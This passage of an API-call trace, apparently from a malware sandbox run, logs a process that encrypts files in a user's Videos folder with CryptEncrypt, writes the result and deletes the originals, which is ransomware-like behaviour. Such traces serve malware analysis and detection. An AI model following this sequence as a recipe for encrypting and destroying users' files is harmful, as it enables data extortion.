lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb120, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.417] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453d298*, pdwDataLen=0x144de30*=0xd0cb, dwBufLen=0xd0d0 | out: pbData=0x453d298*, pdwDataLen=0x144de30*=0xd0d0) returned 1 [0105.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.417] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xd0d0, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144e834*=0xd0d0, lpOverlapped=0x0) returned 1 [0105.419] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0105.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0105.419] CryptDestroyKey (hKey=0x41ac140) returned 1 [0105.419] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.420] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0105.420] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0105.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.420] FreeLibrary (hLibModule=0x756e0000) returned 1 [0105.420] CloseHandle (hObject=0x258) returned 1 [0105.421] CloseHandle (hObject=0x298) returned 1 [0105.423] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi", lpFilePart=0x0) returned 0x64 [0105.423] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\c98txuiy1khtvyz_ctr.avi")) returned 0x20 [0105.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0105.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0105.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0105.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0105.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0105.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0105.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0105.424] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55aa7690, ftCreationTime.dwHighDateTime=0x1d5ea91, ftLastAccessTime.dwLowDateTime=0xd1eca410, ftLastAccessTime.dwHighDateTime=0x1d5f0d3, ftLastWriteTime.dwLowDateTime=0xd1eca410, ftLastWriteTime.dwHighDateTime=0x1d5f0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd0cb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="C98TxuIy1khtVyZ_cTR.avi", cAlternateFileName="C98TXU~1.AVI")) returned 0x41ac180 [0105.424] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\c98txuiy1khtvyz_ctr.avi")) returned 1 [0105.469] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55aa7690, ftCreationTime.dwHighDateTime=0x1d5ea91, ftLastAccessTime.dwLowDateTime=0xd1eca410, ftLastAccessTime.dwHighDateTime=0x1d5f0d3, ftLastWriteTime.dwLowDateTime=0xd1eca410, ftLastWriteTime.dwHighDateTime=0x1d5f0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd0cb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="C98TxuIy1khtVyZ_cTR.avi", cAlternateFileName="C98TXU~1.AVI")) returned 0 [0105.469] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a88c8 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d3920 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0105.470] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0105.470] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0105.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0105.471] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0105.471] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0105.471] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7c50 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x180) returned 0x43e8260 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7c50 | out: hHeap=0x1780000) returned 1 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0105.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0105.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0105.472] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0105.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0105.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.472] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0105.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0105.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0105.472] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc3fe2b0, ftCreationTime.dwHighDateTime=0x1d5e32d, ftLastAccessTime.dwLowDateTime=0xc02adcb0, ftLastAccessTime.dwHighDateTime=0x1d5ef34, ftLastWriteTime.dwLowDateTime=0xc02adcb0, ftLastWriteTime.dwHighDateTime=0x1d5ef34, nFileSizeHigh=0x0, nFileSizeLow=0x10d75, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="Hf dn4y4LLHbc.swf", cAlternateFileName="HFDN4Y~1.SWF")) returned 0x41ac700 [0105.472] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0105.473] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0105.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0105.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0105.474] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0105.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0105.474] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0105.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0105.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0105.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0105.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0105.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0105.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0105.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0105.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0105.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0105.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0105.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0105.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0105.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0105.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0105.476] RtlAllocateHeap 